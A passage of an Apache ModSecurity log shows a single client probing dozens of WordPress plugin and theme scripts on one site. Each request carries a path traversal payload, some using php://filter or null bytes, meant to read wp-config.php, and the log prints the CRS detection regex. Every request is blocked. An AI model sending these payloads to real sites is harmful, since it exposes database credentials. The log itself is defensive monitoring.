140315188991744] [client 185.206.224.212:44068] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "Y8DyA8x9A9c0KkSpLadQnAAAAJE"] [Fri Jan 13 00:54:12.079037 2023] [:error] [pid 31041:tid 140315306489600] [client 185.206.224.212:44070] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "Y8DyBMPRCDYHCWWhHpAj_AAAAAM"] [Fri Jan 13 00:54:12.193910 2023] [:error] [pid 31043:tid 140315172206336] [client 185.206.224.212:44074] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "Y8DyBMx9A9c0KkSpLadQnQAAAJM"] [Fri Jan 13 00:54:14.568660 2023] [:error] [pid 31043:tid 140315397105408] [client 185.206.224.212:44082] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "Y8DyBsx9A9c0KkSpLadQngAAAIE"] [Fri Jan 13 00:54:14.693418 2023] [:error] [pid 31041:tid 140315230955264] [client 185.206.224.212:44084] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dilima/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dilima/pic.php"] [unique_id "Y8DyBsPRCDYHCWWhHpAj_wAAAAw"] [Fri Jan 13 00:54:14.808489 2023] [:error] [pid 31042:tid 140315214169856] [client 185.206.224.212:44086] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php?path=..%2F..%2F..%2Fwp-config.php&type=aplication%2Fpdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php"] [unique_id "Y8DyBo6vAq65Ygpdg5ObgAAAAE4"] [Fri Jan 13 00:54:16.713751 2023] [:error] [pid 31042:tid 140315130242816] [client 185.206.224.212:44100] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "Y8DyCI6vAq65Ygpdg5ObgwAAAFg"] [Fri Jan 13 00:54:16.842968 2023] [:error] [pid 31042:tid 140315155420928] [client 185.206.224.212:44102] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtheme-unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtheme-unus/css/css.php"] [unique_id "Y8DyCI6vAq65Ygpdg5ObhAAAAFU"] [Fri Jan 13 00:54:18.322010 2023] [:error] [pid 31476:tid 140315272918784] [client 185.206.224.212:44110] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "Y8DyCqGMrWzzUVMdEhcM7QAAAMc"] [Fri Jan 13 00:54:18.443021 2023] [:error] [pid 31043:tid 140315155420928] [client 185.206.224.212:44112] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "Y8DyCsx9A9c0KkSpLadQoAAAAJU"] [Fri Jan 13 00:54:18.561743 2023] [:error] [pid 31043:tid 140315130242816] [client 185.206.224.212:44114] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "Y8DyCsx9A9c0KkSpLadQoQAAAJg"] [Fri Jan 13 00:54:19.527998 2023] [:error] [pid 31043:tid 140315230955264] [client 185.206.224.212:44118] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "Y8DyC8x9A9c0KkSpLadQogAAAIw"] [Fri Jan 13 00:54:19.658377 2023] [:error] [pid 31042:tid 140315298096896] [client 185.206.224.212:44120] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php%2Fwp-content%2Fplugins%2Fhb-audio-gallery-lite%2Fgallery%2Faudio-download.php%3Ffile_path%3D..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "Y8DyC46vAq65Ygpdg5ObhQAAAEQ"] [Fri Jan 13 00:54:19.773180 2023] [:error] [pid 31042:tid 140315281311488] [client 185.206.224.212:44122] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "Y8DyC46vAq65Ygpdg5ObhgAAAEY"] [Fri Jan 13 00:54:22.210328 2023] [:error] [pid 31043:tid 140315147028224] [client 185.206.224.212:44132] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y8DyDsx9A9c0KkSpLadQowAAAJY"] [Fri Jan 13 00:54:22.341408 2023] [:error] [pid 31041:tid 140315155420928] [client 185.206.224.212:44134] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "Y8DyDsPRCDYHCWWhHpAkAQAAABU"] [Fri Jan 13 00:54:22.456287 2023] [:error] [pid 31042:tid 140315289704192] [client 185.206.224.212:44136] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-downloader/ebook_plugin.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-downloader/ebook_plugin.php"] [unique_id "Y8DyDo6vAq65Ygpdg5ObigAAAEU"] [Fri Jan 13 00:54:22.571321 2023] [:error] [pid 31042:tid 140315388712704] [client 185.206.224.212:44138] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-shortcode/inc/force-download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-shortcode/inc/force-download.php"] [unique_id "Y8DyDo6vAq65Ygpdg5ObiwAAAEI"] [Fri Jan 13 00:54:22.686782 2023] [:error] [pid 31042:tid 140315230955264] [client 185.206.224.212:44140] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "Y8DyDo6vAq65Ygpdg5ObjAAAAEw"] [Fri Jan 13 00:54:24.430741 2023] [:error] [pid 31042:tid 140315147028224] [client 185.206.224.212:44148] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kap/download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kap/download.php"] [unique_id "Y8DyEI6vAq65Ygpdg5ObkAAAAFY"] [Fri Jan 13 00:54:24.549347 2023] [:error] [pid 31042:tid 140315405498112] [client 185.206.224.212:44150] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/oxygen-theme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "Y8DyEI6vAq65Ygpdg5ObkQAAAEA"] [Fri Jan 13 00:54:24.664365 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:44152] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/rowe/download/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 